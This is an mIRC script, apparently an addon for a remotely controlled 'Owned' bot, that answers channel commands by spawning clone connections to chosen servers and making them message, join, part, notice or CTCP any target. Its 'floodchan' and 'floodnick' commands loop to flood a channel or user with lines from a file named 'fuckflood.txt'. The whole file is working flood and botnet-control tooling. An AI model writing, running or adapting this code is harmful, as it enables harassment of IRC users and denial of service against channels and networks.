;addon for Owned bot
;made by Mohra-Demon

alias servlist {  /msg $chan I am on ( $+ $scon(0) $+ ) Servers. | set %servnum $calc($scon(0)) | if ($scon(2) == $null) { /msg $chan Server1: $Scon(1).server | halt } |  :loop |  if ($scon( $+ %servnum $+ ) != $null) && if ($scon( $+ %servnum $+ ) != 1) { /msg $chan  Server $+ %servnum $+ : $scon( $+ %servnum $+ ).server } | if (%servnum != 1) { set %servnum $calc(%servnum - 1) } | if (%servnum == 1) { goto end | halt } | else { goto loop } | :end | /msg $chan Server1: $Scon(1).server | set %servnum $calc($scon(0)) | halt }
on 10:text:*:*:{
  if ($1 == .servlist) { servlist }
  if ($1 == .servshow) { 
    if ($scon( $+ $2 $+ ) != $null) { 
    //msg $chan Server $2 $+ , $scon( $+ $2 $+ ).server | halt }
    else { msg $chan Server $2 not Active. | halt }
  }
  if ($1 == .clone) && ($2 == load) { 
    if ($4 == $null) { //msg $chan Usage: .clone load <server> <port> | halt }
  else { /server -m $3 $4 | /scon 2 /ignore *!*@* | /scon 3 /ignore *!*@* | /scon 4 /ignore *!*@* | /scon 5 /ignore *!*@* | /msg $chan Loading Mirc Clone to $3 $+ : $+ $4 } }
  if ($1 == .clone) && ($2 == kill) {
    if ($3 == $null) || ($3 == 1) {
    //msg $chan Usage: .clone kill number(except 1) | halt }
    else if ($scon( $+ $3 $+ ).server != $null) { /msg $chan Killing $3 of connection list. | /scon $3 window -c "Status Window" | halt }
    else { /msg $chan No such connection | halt }
  }
  if ($1 == .clone) && ($2 == msg) { 
    if ($5 == $null) { /msg $chan Usage: .clone msg <scon> <nick\chan> <msg> | halt }
    else { /scon $3 /msg $4 $5 | halt }
  }
  if ($1 == .clone) && ($2 == join) { 
    if ($4 == $null) { /msg $chan Usage: .clone join <scon> <chan> <key> | halt }
    else { /scon $3 /join $4 $5 | halt }
  }
  if ($1 == .clone) && ($2 == part) { 
    if ($5 == $null) { /msg $chan Usage: .clone part <scon> <chan> | halt }
    else { /scon $3 /part $4 | halt }
  }
  if ($1 == .clone) && ($2 == notice) {
    if ($5 == $null) { /msg $chan Usage: .clone notice <scon> <nick\chan> <msg> | halt }
    else { /scon $3 /notice $4 $5 | halt }
  }
  if ($1 == .clone) && ($2 == ctcp) {
    if ($5 == $null) { /msg $chan Usage: .clone ctcp <scon> <nick\chan> <msg> | halt }
    else { /scon $3 /ctcp $4 $5 | halt }
  }
  if ($1 == .clone) && ($2 == floodchan) {
    if ($5 == $null) { /msg $chan Usage: .clone floodchan <scon> <chan> <times> | halt }
    else { 
      /set %times $5
      /set %start 0
      /set %chanfl $4
      /set %scon $3 
      :loop
      if (%start == %times) { halt }
      else {
        /scon %scon join %chanfl
        /scon %scon msg %chanfl $read(fuckflood.txt)
        /scon %scon part %chanfl
        inc %start 1
      goto loop | haltdef }
    }
  }
  if ($1 == .clone) && ($2 == floodnick) {
    if ($5 == $null) { /msg $chan Usage: .clone floodnick <scon> <nick> <times> | halt }
    else { 
      /set %ntimes $5
      /set %nstart 0
      /set %nchanfl $4
      /set %nscon $3 
      :lewp
      if (%nstart == %ntimes) { halt }
      else {
        /scon %scon notice %nchanfl $read(fuckflood.txt)
        /scon %scon msg %nchanfl $read(fuckflood.txt)
        /scon %scon ctcp %nchanfl $read(fuckflood.txt)
        inc %nstart 1
      goto lewp | haltdef }
    }
  }
}
